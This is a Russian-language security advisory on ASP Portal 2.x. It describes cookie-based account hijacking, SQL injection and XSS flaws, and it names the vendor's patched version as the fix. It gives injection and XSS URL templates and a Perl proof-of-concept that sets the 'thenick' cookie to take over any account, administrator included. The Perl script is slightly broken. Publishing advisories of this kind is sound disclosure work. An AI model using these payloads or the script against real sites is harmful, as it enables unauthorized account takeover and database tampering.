Несколько уязвимостей в ASP Portal

Дата публикации:
17.02.2004
Дата изменения:
03.12.2008
Всего просмотров:
1831
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ASP Portal 2.x
Уязвимые версии: ASP Portal

Описание: Несколько уязвимостей обнаружено в ASP Portal. Удаленный пользователь может внедрить SQL команды и может внедриться в учетную запись пользователя. Удаленный пользователь может выполнить XSS нападение.

1. Удаленный пользователь может изменить значение 'thenick' куки, чтобы получить доступ к учетной записи целевого пользователя, включая учетную запись администратора. Эскплоит ниже.

2. sql инъекция:

http://[target]/index.asp?inc=blog&pageid='[SqlQ uery]
http://[target]/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery]

3. XSS
http://[target]/index.asp?inc=' >[XSS]
http://[target]/index.asp?inc=profile&searchtext='>[XSS]
http://[target]/index.asp?inc=forumread&article='>[XSS]

Пример/Эксплоит:

#!/usr/bin/perl -w
## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm

use IO::Socket;
if (@ARGV < 4)
 
print "\n\n";
print " ____________________________________________________________ \n";
print "|                                                            |\n";
print "|   PROOF OF CONCEPT COOKIE ACCOUNT HIJACK                   |\n";
print "|   Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
print "|                                                            |\n";
print "|   By: Manuel López #IST                                    |\n";
print "|____________________________________________________________|\n";
print "\n\n";
exit(1);
 

$host = $ARGV[0];
$directorio = $ARGV[1];
$usuario = $ARGV[2];
$fichero = $ARGV[3];

print "\n";
print "----- Conectando <----\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conectado\n";
print "====> Enviando Datos\n";
$socket->print(<<taqui) or die "write: $!";
GET http://$host/$directorio HTTP/1.1
Cookie: thenick=$usuario

taqui
print "====> OK\n";
print "====> Generando $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;

URL производителя: http://www.aspportal.net/

Решение:Установите обновленную версию портала: http://www.aspportal.net/downloadsviewer.asp?theurl=38

Ссылки: ASP Portal Multiple Vulnerabilities
http://www.aspportal.net/index.asp?inc=newsread&article=91

или введите имя

CAPTCHA